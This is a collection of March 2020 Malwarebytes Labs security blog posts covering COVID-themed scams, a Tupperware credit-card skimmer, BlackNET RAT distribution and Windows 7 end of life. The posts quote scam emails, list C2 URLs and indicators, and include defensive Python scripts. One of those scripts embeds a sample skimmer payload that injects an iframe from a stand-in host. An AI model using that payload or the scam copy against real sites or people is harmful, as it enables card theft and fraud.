In the last week, we’ve seen multiple coronavirus scams pushed by bad actors, including RAT attacks via fake health advisories, bogus e-books working in tandem with Trojans, and lots of other phishing shenanigans. Now we have another one to add to the ever-growing list: dubious coronavirus Bitcoin missives landing in your inbox.

Reworking a classic spam tactic

This is a retooling of an older spam run involving British comedian Jim Davidson, the older form of which was seen bouncing around in November 2019. As they put it, “Jim Davidson bounced back from bankruptcy with Bitcoin.” Even before that, in the first half of 2019, he was being used alongside other well-known British celebrities such as Jamie Oliver and daytime TV presenters to promote a variety of misleading Bitcoin get-rich schemes. This is common for Bitcoin scams, and you can dip into any year you like and find a few of these floating around at any given time.

What do we have this time?

In short, these coronavirus Bitcoin scams are older attempts to have people part with their cash, hastily retooled to make hay with the current global pandemic. It’s incredibly lazy: the landing pages and follow-on websites seem untouched from whenever they first appeared. The only new ingredient is the email content mentioning coronavirus, but sadly, that’s often more than enough to have people part with their money.


It begins with a non-stop drip-feed of emails, from many different addresses pumping out spam. In the mailbox we examined, it’s a total of 11 in six days. All of the email addresses are rather optimistically called “coronavirus positives”, letting you know that staying at home thanks to a global pandemic can actually make you rich beyond your wildest dreams.

Some of the subject lines read as follows:

Staying at home because of COVID-19!! Spend your time making thousands on Bitcoins. 

The positive impact of staying home (Corona-virus), Make thousand a day trading Bitcoin.

Join 1000s of Brits making 1000s a day. Bitcoin is back – and this time you can make a million.

Without a larger sample selection to go from, we can’t say which missive is the most popular subject line, but the one mentioning “work from home” is at least the most popular in this particular mailbox and a few others that we’ve seen. 

Coronavirus Bitcoin email style

The emails are formatted in much the same way, emulating the British newspaper “red top” style—most specifically, The Sun.

Here’s the text from one of the samples we looked at:

Jim Davidson Reveals How He Bounced Back After The Bankruptcy – He claims anyone can do it & shows ‘Good Morning Britain’ How!

Appearing on ‘Good Morning Britain’ show, Jim Davidson, a man who has recovered from Bankruptcy thanks to an automated Bitcoin trading platform, called BTC Profit . The idea was simple: allow the average person the opportunity to cash in on the Bitcoin boom. Even if they have absolutely no investing or technology experience.

A user would simply make an initial deposit into the platform, usually of £200 (or $250, as the platform works with USD) or more, and the automated trading algorithm would go to work. Using a combination of data and machine learning, the algorithm would know the perfect time to buy Bitcoin low and sell high, maximising the user’s profit.

To demonstrate the power of the platform Jim had Kate Garraway deposited £200 on the live show.

Here’s one that emulates The Sun to a high degree, complete with an almost-but-not-quite name set in the same font as the well-known newspaper.

In the above mail, a student reveals how “he earns more than £40,000 every month working from home.” Some of the links are now seemingly broken, and a few redirect to Google or to random shopping sites, presumably when you visit from a region the scammers are not interested in.

Not all of the links are broken, however. A few will indeed lead you to the supposed Bitcoin promised land.

Getting rich quick?

What you’ll see on a live page is essentially a rehash of the information in the email, complete with a few more familiar faces from UK daytime television. At this point, the coronavirus hook has been entirely abandoned.

After a lot of urging the visitor to sign up to some sort of wonderful Bitcoin system, clicking the links will finally take them to the end game.

It’s a landing page promoting something called “Bitcoin Revolution.” This has been around for a while, usually in relation to dubious ads featuring the previously mentioned celebrities.

Access is given to a trading platform, a fair amount of money is deposited into it over time, an “investment manager” asks you to deposit their commission into a bank account so they can release your funds, and…oh dear. This is the part where people report the funds never arrive and now they’re massively out of pocket.

Profiting from chaos

Endlessly spamming these “get rich quick” emails to people in normal circumstances is bad enough, but jumping on the coronavirus bandwagon to claim people can make a fortune from working from home is dreadful. This is absolutely the worst time to end up losing a significant amount of savings—they may prove to be absolutely essential further down the line.

If you receive one of these mails and they’re not automatically placed into your spam folder, report, delete, and move on. We have a feeling you won’t be making your millions from this one.

The post Coronavirus Bitcoin scam promises “millions” working from home appeared first on Malwarebytes Labs.


Consumerization: a better way to answer cybersecurity challenges

Malware Bytes Security - Wed, 03/25/2020 - 12:00pm

A version of this article originally appeared in Forbes on February 12, 2020.

Consumerization: The specific impact that consumer-originated technologies can have on enterprises. 


More and more, enterprises are coming to understand that they need to adopt the agile processes and product strategies of startups in order to compete in today’s markets. But there is a parallel problem in enterprise security that is not being addressed. Simply tweaking your internal processes won’t solve this problem: A different approach is needed.

We read the stories every day. The number and severity of cyberattacks keep growing. More and more businesses are being breached more and more often—and it’s happening in schools, hospitals and clinics, and major cities, too.

For example, in December 2019, the city of New Orleans told employees to “power down computers, unplug devices, and disconnect from Wi-Fi” after a cyberattack struck its computers. Although 911 emergency services were not affected, the police department had to shut down its entire IT network.

Increasingly, we see governments, organizations, and enterprises struggling to keep up with cyberattacks. And, disturbingly, they are increasingly failing to stop them.

The fact is, agile processes and improved efficiency won’t solve the growing security problem. Nor will throwing more personnel at it. That’s what organizations are attempting now, and it’s not working. Businesses are falling behind the attackers. Something has to change.

What is needed is a new way of thinking about security.

When you get millions of alerts, and you respond by looking for more trained technicians to troubleshoot the alerts, you’re pursuing a faulty strategy. For one, you won’t find the talent. For another, the strategy doesn’t scale. As you add security tools and staff, you multiply the complexity of your security operation. What you need is to reduce the complexity.

It’s helpful to step back and ask, “What would a desirable, effective security solution look like?” I suggest that it should be as intuitive as using an iPhone app.

“Hold on,” you say. “The IT market is not like the consumer market. There are different problems to solve, unique expectations to meet, and technical skillsets required to operate.” And that’s all true. But that’s just a description of the challenges inherent with the old model of security thinking.

Consider the security and privacy challenges in the consumer space. Consumer products have to be easy to use, or they won’t sell—particularly for a problem that is mostly invisible to the consumer (until it bites them). Security tools need to be easy enough for consumers to use, yet powerful enough to give them ownership of their privacy and security. That’s hard to achieve, but consumer software development is all about empowering users without overwhelming them with complexity.

And that has to be the goal in the enterprise as well. It should be just as easy for a company to protect itself and have a strong cybersecurity posture as it is for a consumer to use an app. Organizations should strive for top protection using fewer staff members that require specialized training. That should be the target of enterprise security solutions.

We call this goal the democratization, or consumerization, of cybersecurity. It’s the right goal in today’s market. It’s also quite difficult. To write robust cybersecurity products that provide organizations with comprehensive coverage and are as simple to use as consumer technology is so difficult that no one has been up to the task.

It’s easy to generate a new security tool that handles lots and lots of alerts. But making it prioritize threats so that you only address real dangers while simplifying user interface so that it doesn’t require extensive training—that’s the hard part. And that’s what we’re talking about when we refer to the consumerization of IT security.

It reminds me of the famous saying by French mathematician Blaise Pascal, which is often attributed to Mark Twain: “I would have written a shorter letter, but I did not have the time.” Simple is hard.

But it can be done. We know what consumer-grade tools look like. And we know what cybersecurity challenges businesses face. The task before us as an industry is to fit these two puzzle pieces together. It will require greater attention to user interface design and highly-automated threat detection. It will call for combining technical excellence with human intuition. But it can be done.

The consumerization of IT security—consumer-grade ease of use, plus enterprise security expertise—can meet the cybersecurity challenges of today.

The post Consumerization: a better way to answer cybersecurity challenges appeared first on Malwarebytes Labs.


Criminals hack Tupperware website with credit card skimmer

Malware Bytes Security - Wed, 03/25/2020 - 11:00am

On March 20, Malwarebytes identified a targeted cyberattack against household brand Tupperware and its associated websites that is still active today. We attempted to alert Tupperware immediately after our discovery, but none of our calls or emails were answered.

Threat actors compromised the official tupperware[.]com site—which averages close to 1 million monthly visits—as well as a few of its localized versions by hiding malicious code within an image file that activates a fraudulent payment form during the checkout process. This form collects customer payment data via a digital credit card skimmer and passes it on to the cybercriminals with Tupperware shoppers none the wiser.

Digital credit card skimmers, also known as web skimmers, continue to be one of the top web threats we monitor at Malwarebytes. For the past several years, a number of criminals (usually tied to organized Magecart groups) have been actively compromising e-commerce platforms with the goal of stealing payment data from unaware shoppers.

In light of the COVID-19 outbreak, the volume of people shopping online has dramatically increased, and there is little doubt that a larger number of transactions will be impacted by credit card skimmers moving forward.

There was a fair amount of work put into the Tupperware compromise to integrate the credit card skimmer seamlessly and stay undetected for as long as possible. Below, we walk you through how we discovered the skimmer, and analyze the threat and its attack techniques.

Rogue iframe container

During one of our web crawls, we identified a suspicious-looking iframe loaded from deskofhelp[.]com when visiting the checkout page at tupperware[.]com. This iframe is responsible for displaying the payment form fields presented to online shoppers.

There are a few red flags with this domain name:

  • It was created on March 9, and as we see with many fraudulent websites, newly registered domains are often put to use by threat actors shortly before a new campaign.
  • It is registered to elbadtoy@yandex[.]ru, an email address with the Russian provider Yandex, which seems at odds with a payment form on a US-branded website.
  • It is hosted on a server at 5.2.78[.]19 alongside a number of phishing domains.

Interestingly, if you were to inspect the checkout page’s HTML source code, you would not see this malicious iframe. That’s because it is injected into the Document Object Model (DOM) at runtime by JavaScript, so it never appears in the static HTML served by the site.

One way to reveal this iframe is to right click anywhere within the payment form and choose “View frame source” (in Google Chrome). It will open up a new tab showing the content loaded by deskofhelp[.]com.

There is one small flaw in the integration of the credit card skimmer: the attackers didn’t carefully consider (or perhaps didn’t care about) how the malicious form would look on localized pages. For example, the Spanish version of the Tupperware site is written in Spanish, but the rogue payment form is still in English, whereas the legitimate form is in Spanish.

More trickery to dupe shoppers

The criminals devised their skimmer attack so that shoppers first enter their data into the rogue iframe and are then immediately shown an error, disguised as a session time-out.

This allows the threat actors to reload the page with the legitimate payment form. Victims will enter their information a second time, but by then, the data theft has already happened.

Upon close inspection, we see the fraudsters even copied the session time-out message from CyberSource, the payment platform used by Tupperware. The legitimate payment form from CyberSource includes a security feature where, if a user is inactive after a certain amount of time, the payment form is cancelled and a session time-out message appears. Note: we contacted Visa who owns CyberSource to report this abuse as well.

You can still spot a slight difference between the legitimate time-out page and the fake one. The former contains the text “Session timed out” in bold, black text, while the latter features gray text that is both smaller and in a different font.

The stolen data is sent to the same domain used to host the rogue iframe. Fraudsters are now in possession of the following data from unaware shoppers:

  • First and last name
  • Billing address
  • Telephone number
  • Credit card number
  • Credit card expiry date
  • Credit card CVV

Another case of steganography

In order to identify how the card skimmer attack worked, we needed to go back a few steps and examine all web resources loaded by tupperware[.]com, including image files.

This process can be time-consuming but is necessary to figure out how the rogue iframe is injected. We found a snippet of code on the homepage that dynamically loads an FAQ icon from Tupperware’s own server; the request happens silently, so shoppers never see the image. The file is a malformed PNG, which is suspicious in itself.

Looking at this file in a hex editor, we can see the different sections of the image. The IEND chunk should mark the end of a PNG file, but here, after some padding bytes, there is a large JavaScript blob, several parts of which are encoded.
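The hex-editor inspection described above can be automated. The following Python script is an added example (not Malwarebytes’ tooling and not the skimmer’s own code): it walks a PNG’s chunk list, verifies each chunk’s CRC, and returns whatever bytes follow the IEND chunk. The 1x1 image and the JavaScript appended to it are constructed here so the script runs without the real faq_icon.png; the `skimmer.invalid` host in the sample payload is a placeholder.

```python
"""Walk a PNG's chunks and report anything that follows IEND.

Added example, not code from the original post or from Malwarebytes. The
1x1 image and the JavaScript appended to it are constructed here so the
script runs without the real faq_icon.png.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Constructed stand-in for the blob the post describes: padding, then script.
# 'skimmer.invalid' is a reserved placeholder name, not a real host.
SAMPLE_PAYLOAD = (
    b"    \n"
    b"(function(){var f=document.createElement('iframe');"
    b"f.src='https://skimmer.invalid/form';document.body.appendChild(f);})();"
)


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: 4-byte big-endian length, type, data, CRC32(type+data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_minimal_png(corrupt_idat_crc: bool = False) -> bytes:
    """Build a valid 1x1 8-bit greyscale PNG; optionally zero the IDAT CRC."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # w, h, depth, grey, defaults
    idat = _chunk(b"IDAT", zlib.compress(b"\x00\x00"))   # filter byte + one pixel
    if corrupt_idat_crc:
        idat = idat[:-4] + b"\x00\x00\x00\x00"
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + idat + _chunk(b"IEND", b"")


def inspect_png(data: bytes) -> dict:
    """Parse the chunk list and return everything after IEND.

    Result keys: 'chunks' (types in order), 'bad_crc' (chunks whose stored CRC
    does not match, i.e. a malformed image) and 'trailer' (raw bytes after the
    IEND chunk). A well-formed PNG has an empty trailer.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    chunks, bad_crc = [], []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc_bytes) < 4:
            raise ValueError("truncated %r chunk at offset %d" % (ctype, pos))
        name = ctype.decode("ascii", "replace")
        chunks.append(name)
        if struct.unpack(">I", crc_bytes)[0] != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            bad_crc.append(name)
        pos += 12 + length
        if ctype == b"IEND":
            return {"chunks": chunks, "bad_crc": bad_crc, "trailer": data[pos:]}
    raise ValueError("no IEND chunk found")


def looks_like_script(trailer: bytes) -> bool:
    """Heuristic: non-empty printable ASCII after IEND containing JavaScript-ish tokens."""
    text = trailer.strip()
    if not text or any(b > 0x7E or (b < 0x20 and b not in b"\t\r\n") for b in text):
        return False
    return any(tok in text for tok in (b"function", b"eval(", b"document.", b"createElement", b"iframe"))


if __name__ == "__main__":
    for label, blob in (("clean", make_minimal_png()),
                        ("with payload", make_minimal_png() + SAMPLE_PAYLOAD),
                        ("bad CRC", make_minimal_png(corrupt_idat_crc=True))):
        r = inspect_png(blob)
        print(label, r["chunks"], "bad CRC:", r["bad_crc"],
              "trailer bytes:", len(r["trailer"]), "script?", looks_like_script(r["trailer"]))
```

A normal PNG decoder stops at IEND and ignores whatever follows, which is exactly why this trick survives image validation and renders as a perfectly good icon. Flagging any non-empty trailer on images served from your own origin is a cheap, high-signal check; the CRC comparison additionally catches chunks that were edited in place.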

At this point, we did not yet know what the code was meant to do, but we could tell it was some kind of steganographic attack, a technique we observed in web skimmers late last year. One way to find out is to debug the JavaScript code, despite the malware author’s attempts to crash the debugger.

Once we got past that hurdle, we could finally confirm that the code embedded in this PNG image is responsible for loading the rogue iframe on the checkout page.

There is additional code so that the skimmer is loaded seamlessly and covertly. The threat actors hide the legitimate, sandboxed payment iframe by referencing its ID and setting it to display:none.

The fake payment form is also referenced so that it fits in its place and looks exactly the same (except on localized versions). This required some effort from the fraudsters to mimic the same style and functionality.

The domain deskofhelp[.]com contains a set of JavaScript, CSS, and image files to that effect, and of course, the code to check for and exfiltrate the payment data.

Site compromise

One question we haven’t answered yet is how the malicious PNG image gets loaded. We know that the embedded JavaScript injects code dynamically into the DOM, but something needs to request that PNG file first, and that has to be visible in the HTML source code.

To make identification slightly more difficult, the loader code has been split into fragments. We can reconstruct it, however, and see that the URL of the PNG file is assembled at runtime by string concatenation, so a plain search of the page source for the file name would not find it.

This code is helpful to determine a time frame for when the website compromise happened. Although we don’t have archives, we know from external sources, such as this WayBackMachine crawl, that the code was not present in February. The hack most likely happened after March 9, which is when the malicious domain deskofhelp[.]com became active.

We do not know exactly how Tupperware got hacked, but a scan via Sucuri’s SiteCheck shows that they may be running an outdated version of the Magento Enterprise software.

Disclosure and protection

Upon identifying this compromise, we called Tupperware on the phone several times, and also sent messages via email, Twitter, and LinkedIn. However, at time of publication, we still have not heard back from the company and the site remains compromised.

Malwarebytes users are protected against this attack, including those running our free Browser Guard extension.

We will update this blog if we receive any additional information.

Indicators of compromise

Malicious PNG file hosted on Tupperware sites:

tupperware[.]com/media/wysiwyg/faq_icon.png
tupperware[.]ca/media/wysiwyg/faq_icon.png
es.tupperware[.]com/media/wysiwyg/faq_icon.png

SHA-256 of malicious PNG


Skimmer infrastructure

deskofhelp[.]com
5.2.78[.]19

The post Criminals hack Tupperware website with credit card skimmer appeared first on Malwarebytes Labs.


Windows 7 is EOL: What next?

Malware Bytes Security - Tue, 03/24/2020 - 1:37pm

End-of-life (EOL) is an expression commonly used by software vendors to indicate that a product or version of a product has reached the end of usefulness in the eyes of the vendor. Many companies, including Microsoft, announce the EOL dates for their products far in advance.

Every Windows product has a lifecycle. The lifecycle begins when a product is released and ends when it’s no longer supported. Knowing key dates in this lifecycle helps you make informed decisions about when to update, upgrade, or make other changes to your software.

Windows 7 EOL

For those that were unaware, Windows 7 reached EOL on January 14, 2020. When a Windows Operating System (OS) hits the end of its lifecycle, it no longer receives updates from Microsoft.

That means Microsoft no longer supports users of Windows 7, and Windows 7 will no longer receive updates, although Microsoft has been known to make exceptions for urgent vulnerabilities. And while organizations may be able to extend support by paying for it, home users are advised to move on to more modern operating systems.

Or as Microsoft puts it:

“Now is the time to shift to Windows 10. Get robust security features, enhanced performance, and flexible management to keep your employees productive and secure.”

And of course, they have a point. If cybercriminals discover a vulnerability in Windows 7, there is no guarantee that this vulnerability will be patched by Microsoft. As long as there is still a large Windows 7 user base, it pays for cybercriminals to weaponize such a vulnerability and use it to their advantage. Keep in mind that most exploit kits active in the wild target older, already-known vulnerabilities, which will never be patched on EOL software.

Is Windows 10 more secure?

While the call to move on to Windows 10 by Microsoft makes it sound mighty safe, what exactly are these security features that Windows 10 has over Windows 7? We know it’ll be supported by Microsoft, and therefore any known vulnerabilities will be patched. Its other security features are as follows:

  • Windows 10 includes Windows Defender by default, which provides a baseline level of antivirus protection.
  • SmartScreen is a reputation system that tries to block harmful and unknown file downloads.
  • Windows 10 ships Microsoft Edge as its default browser in place of Internet Explorer, the browser most often targeted by exploit kits.

On the downside, you might argue that Windows 10 has a lot of new features that tend to come with new problems and risks. However, Windows 10 has been around for a while now, so the worst problems should have been tackled.

However, we want to stress: Moving on to a new operating system, while safer than sticking with a legacy system, is no substitute for a strong security solution. Even Windows 10 machines need anti-malware protection.

According to a spokesperson from our malware removal staff, the correlation between browser use and malware is actually higher than the one between OS version and malware. Meaning: The browser you use has a much bigger impact on the likelihood of being infected than the OS that you use. So even if you switch over to Windows 10 but keep using Google Chrome, you can still be easily infected. Now that Windows 10 has switched over to Edge, many cybercriminals are focusing on exploits for Google Chrome, one of the most popular browsers today.

Other operating systems

To avoid potential infection—or because they’re looking for a change— some Windows users might consider moving to entirely different operating systems, such as Mac or Linux. But layering up built-in protection with security software is important, even if you decide to switch.

For example, the long-standing belief that Macs are inherently safer than Windows systems no longer holds. As you can read in our 2020 State of Malware Report, Mac threats grew far faster than Windows threats in 2019, with nearly double the number of detections per Mac endpoint compared with Windows. And while classic self-replicating viruses are rare on the Mac, Mac adware has become more sophisticated and more dangerous than traditional Mac malware.

In some cases, people may consider switching to a Chromebook, which is certainly a cheaper option if it offers enough capabilities to replace your current Windows desktop or laptop. But even Chromebooks can—and do—get infected.

We don’t expect a lot of users to switch to a more hardcore Linux OS, since they might expect a huge learning curve (another misconception) or their favorite software is not available (unfortunately, not a myth). However, even if they do, Linux OSes are not free from malware. They’re simply attacked less often because cybercriminals understand their user base isn’t as large (and therefore, their payday isn’t as big).

Windows 7 user base

Currently, over 23 percent of Windows users worldwide are still on Windows 7, while 69 percent have already switched to Windows 10. The rest are using the less popular Windows 8 or versions of Windows that went EOL long before Windows 7.

Oddly enough, the percentage of Windows 7 users has hardly decreased after reaching the EOL date in January (from roughly 24 percent to 23 percent). With this huge amount of potentially unpatched systems still active in the market, any exploitable vulnerability will result in a widespread disaster.

Would WannaCry have had such an enormous impact if Windows XP and Windows Server 2003 had been abandoned before it spread? We will never know. What we do know is that systems which had installed Microsoft’s March 2017 update for the SMB vulnerability (MS17-010), including supported Windows 7, 8.1 and 10 machines, were not contributing to the choir of systems trying to infect their neighbors. Emergency patches had to be released after the outbreak for versions that were already out of support, such as Windows XP, Windows 8 and Server 2003. Windows 7 was still supported at the time, so it had received the fix through regular updates two months earlier; the Windows 7 machines that did spread WannaCry were the ones that had not installed it.

We got you

It is not our habit to promote our own products in our blogs, but we wanted to let you know that whichever OS (and browser) you choose next, we’ve got your back. As a demonstration, here is a list of the available Malwarebytes consumer versions created to protect our users:

Malwarebytes for Windows

Malwarebytes for Mac

Malwarebytes for Chromebook

Malwarebytes for Android

Malwarebytes for iOS

Malwarebytes Browser Guard (for Firefox and Chrome)

Download links, pricing, and more information, such as a list of our business offerings and customer reviews, can be found on our pricing page.

Stay safe, everyone!

The post Windows 7 is EOL: What next? appeared first on Malwarebytes Labs.


Fake “Corona Antivirus” distributes BlackNET remote administration tool

Malware Bytes Security - Mon, 03/23/2020 - 3:35pm

Scammers and malware authors are taking advantage of the coronavirus crisis in full swing. We have seen a number of spam campaigns using COVID-19 as a lure to trick people into installing a variety of malware, but especially data stealers.

As more of us work from home, the need to secure your computer, especially if you are connecting to your company’s network, becomes more important. However, you should be extra careful of bogus security software, especially if it tries to use the coronavirus as a selling point.

Corona antivirus: 100% fake

The latest scam we found is a website (antivirus-covid19[.]site) advertising “Corona Antivirus -World’s best protection.” That’s right, scammers are trying to get you to install a digital antivirus that supposedly protects against the actual COVID-19 virus infecting people across the world.

To add to the nonsense, the site goes on by adding:

Our scientists from Harvard University have been working on a special AI development to combat the virus using a windows app. Your PC actively protects you against the Coronaviruses (Cov) while the app is running.

Infected victims added to BlackNET RAT

Upon installing this application, your computer will be infected with malware. The file, packed with the commercial packer Themida turns your PC into a bot ready to receive commands:

hxxps[://]instaboom-hello[.]site//connection[.]php?data=[removed]

hxxps[://]instaboom-hello[.]site//getCommand[.]php?[removed]

hxxps[://]instaboom-hello[.]site//receive[.]php?command=[removed]

The command and control server hosted at instaboom-hello[.]site reveals the control panel for the BlackNET botnet.

The full source code for this toolkit was published on GitHub a month ago. Some of its features include:

  • Deploying DDOS attacks
  • Taking screenshots
  • Stealing Firefox cookies
  • Stealing saved passwords
  • Implementing a keylogger
  • Executing scripts
  • Stealing Bitcoin wallets
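The three beacon URLs quoted above (check-in, command poll, result report) are a usable detection signal in outbound web-proxy logs. The script below is an added example, not Malwarebytes' code: it groups requests per client and C2 host and alerts only when more than one stage of the sequence is seen, so a lone unrelated getCommand.php does not fire. The log format, client IPs and timestamps are constructed; the host is the one named in the post, written without defanging brackets so it parses.

```python
"""Added example: flag BlackNET-style beacon sequences in proxy logs.

The endpoint names and query parameters follow the C2 URLs quoted in
the post. Everything else (log format, IPs, times) is constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Endpoint sequence the bot walks through: check-in, poll, report.
BLACKNET_ENDPOINTS = {
    "connection.php": "checkin",
    "getCommand.php": "poll",
    "receive.php": "report",
}
# Query parameter each endpoint carried in the observed URLs.
EXPECTED_PARAM = {"connection.php": "data", "receive.php": "command"}

# Constructed proxy log: "<ISO time> <client ip> <method> <url> <status>".
# The C2 host is the one from the post; the doubled slash in the path is
# reproduced as observed.
SAMPLE_LOG = """\
2020-03-23T10:00:01 10.0.0.5 GET https://instaboom-hello.site//connection.php?data=x 200
2020-03-23T10:00:31 10.0.0.5 GET https://instaboom-hello.site//getCommand.php?id=1 200
2020-03-23T10:01:01 10.0.0.5 GET https://instaboom-hello.site//receive.php?command=y 200
2020-03-23T10:01:05 10.0.0.9 GET https://example.org/getCommand.php 404
2020-03-23T10:02:00 10.0.0.7 GET https://example.com/index.html 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def classify(url):
    """Return (endpoint, stage) when the URL's last path segment is a
    BlackNET endpoint and carries the parameter seen in the post's URLs;
    otherwise None."""
    parts = urlsplit(url)
    name = parts.path.rsplit("/", 1)[-1]
    stage = BLACKNET_ENDPOINTS.get(name)
    if stage is None:
        return None
    want = EXPECTED_PARAM.get(name)
    if want and want not in parse_qs(parts.query, keep_blank_values=True):
        return None
    return name, stage


def find_beacons(log_text, min_stages=2):
    """Group matching requests per (client, host) and alert on pairs that
    reached at least `min_stages` distinct stages of the sequence."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than fail the whole run
        ts, client, _method, url, _status = m.groups()
        found = classify(url)
        if found is None:
            continue
        hits[(client, urlsplit(url).hostname)].append((ts, found[1]))
    alerts = []
    for (client, host), events in hits.items():
        stages = sorted({stage for _, stage in events})
        if len(stages) >= min_stages:
            alerts.append({"client": client, "host": host,
                           "stages": stages, "requests": len(events)})
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(SAMPLE_LOG):
        print(alert)
```
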

Choose the right protection

During this period, it is important to stay safe both at home and online. The number of scams we have seen during these past few weeks shows that criminals will take advantage of any situation, no matter how dire it is.

We recommend that you keep your computer up to date and use extra caution when downloading new programs. Beware of instant notifications and other messages, even if they appear to come from friends.

Malwarebytes users were already protected even though we had not seen this malware sample before, thanks to our Machine learning engine.

We also informed CloudFlare since the threat actors were abusing their service and they took immediate action to flag this website as a phish.

Indicators of compromise

Malicious site

Bogus corona antivirus

antivirus-covid19[.]site/update.exe

146dd15ab549f6a0691c3a728602ce283825b361aa825521252c94e4a8bd94b4

C2 panel
The post Fake “Corona Antivirus” distributes BlackNET remote administration tool appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (March 16 – 22)

Malware Bytes Security - Mon, 03/23/2020 - 12:44pm

Last week on Malwarebytes Labs, we concluded our series on child identity theft. We also looked into threat actors and campaigns that ride the COVID-19 train, namely the criminal group APT36 and threat actors purporting to be the World Health Organization (WHO) but instead spreading malware. Lastly, we have tips for those who are working at home to stay secure while social distancing.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (March 16 – 22) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Coronavirus scams, found and explained

Malware Bytes Security - Fri, 03/20/2020 - 11:00am

Coronavirus has changed the face of the world, restricting countless individuals from dining at restaurants, working from cafes, and visiting their loved ones. But for cybercriminals, this global pandemic is expanding their horizons.

In the past week, Malwarebytes discovered multiple email scams that prey on the fear, uncertainty, and confusion regarding COVID-19, the illness caused by the novel coronavirus. With no vaccine yet developed, and with much of the world undergoing intense social distancing measures and near-total lockdown procedures, threat actors are flooding cyberspace with emailed promises of health tips, protective diets, and, most dangerously, cures. Attached to threat actors’ emails are a variety of fraudulent e-books, informational packets, and missed invoices that hide a series of keyloggers, ransomware, and data stealers.

The problem expands beyond pure phishing scams.

On March 14, Twitter user @dustyfresh published a web tracker that found 3,600 coronavirus- and COVID-19-related hostnames that sprang up in just 24 hours.

On March 17, security researcher and python developer @sshell_ built a tool, hosted by the team at ThugCrowd, that provides real-time scans for potentially malicious, coronavirus-related domains. Just click the link and watch possible scam sites get registered every minute.

Further, RiskIQ reportedly tracked more than 13,000 suspicious, coronavirus-related domains last weekend, and more than 35,000 domains the next day, too.

These numbers mean little without real, useful examples, though. Yes, coronavirus scams and scam sites are out there, but what do they look like, and how do they work? We’re here to explain.

Here are some of the many email scams that Malwarebytes spotted in the wild, with full details on what they say, what they’re lying about, and what types of malware they’re trying to install on your machines. The good news? Malwarebytes protects against every threat described.

Impersonating the World Health Organization

Earlier this week, we found an email phishing campaign sent by threat actors impersonating the World Health Organization (WHO), one of the premier scientific resources on COVID-19. That campaign, which pushed a fake e-book to victims, delivered malicious code for a downloader called GuLoader. That download is just the first step in a more complex scheme.

As we wrote:

“GuLoader is used to load the real payload, an information-stealing Trojan called FormBook, stored in encoded format on Google Drive. Formbook is one of the most popular info-stealers, thanks to its simplicity and its wide range of capabilities, including swiping content from the Windows clipboard, keylogging, and stealing browser data. Stolen data is sent back to a command and control server maintained by the threat actors.”

Unfortunately, this GuLoader scam is just one of many in which threat actors posed as WHO professionals as a way to trick victims into downloading malicious attachments.

On March 18, we uncovered an email campaign that pushed victims into unwittingly downloading an invasive keylogger called Agent Tesla. The keylogger, which experienced a reported 100 percent increase in activity across three months in 2018, can steal a variety of sensitive data.

As cybersecurity researchers at LastLine wrote: “Acting as a fully-functional information stealer, [Agent Tesla] is capable of extracting credentials from different browsers, mail, and FTP clients. It logs keys and clipboards data, captures screen and video, and performs form-grabbing (Instagram, Twitter, Gmail, Facebook, etc.) attacks.”

The Agent Tesla campaign that we tracked on Wednesday involved an email with the subject line: Covid19″ Latest Tips to stay Immune to Virus !!

The email came to individuals’ inboxes allegedly from the WHO, with a sender email address of “” Notice that the sender’s email address ends with “.com” when legitimate WHO email addresses instead end with “.int.”

The email alleges to include a PDF file about “various diets and tips to keep us safe from being effected with the virus.” It is signed by a “Dr. Sarah Hopkins,” a supposed media relations consultant for the WHO.

A quick online search reveals that the WHO has a public website for contacting its media relations representatives, and that none of those representatives is named Sarah Hopkins. Also, note how “Dr. Hopkins” has a phone number that doesn’t work, at +1 470 59828. Calling the number from a US-based phone resulted in an error message from the mobile service provider.

Interestingly, the above scam is just one example of an email campaign that both impersonates the WHO and attempts to deliver Agent Tesla.

On the same day we found the above-mentioned Agent Tesla scam, we found another that mirrored its tactics and payload.

The second Agent Tesla scam arrives in individuals’ inboxes with the email subject line “World Health Organization/Let’s fight Corona Virus together.”

Already, savvy readers should spot a flaw. The unnecessary space placed between the words “Corona” and “Virus” mirrors a similar grammatical error, an unnecessary hyphen, in the GuLoader scam we covered on Malwarebytes Labs this week.

The entire body of the email reads, verbatim:

We realise that the spread of the COVID-19 coronavirus may leave you feeling concerned, so we want to take a moment to reassure you that your safety and well-being remains our absolutely top priority.

Please be assured that our teams are working hard and we are monitoring the situation and developments closely with the health and governmental authorities of all countries we operate in. See attached WHO vital information to stay healthy.

we personally thank you for your understanding and assure you that we will do our utmost to limit disruptions this event brings to your travel plans while keeping your well-being our top priority.

This campaign attempts to trick victims into downloading a fake informational packet on coronavirus, with the file title “COVID-19 WHO RECOMMENDED V.gz.” Instead of trustworthy information, victims are infected with Agent Tesla.

While this campaign does not include as many smoke-and-mirror tactics, such as a fake media representative and a fake phone number, it can still do serious damage simply by stoking the fears surrounding COVID-19.

Finally, we found a possible WHO impersonator pushing the NetWire Remote Access Trojan (RAT). RATs can allow hackers to gain unauthorized access to a machine from a remote location.

As we explain in our Threat Center profile on RATs, these types of Trojan can have devastating effects:

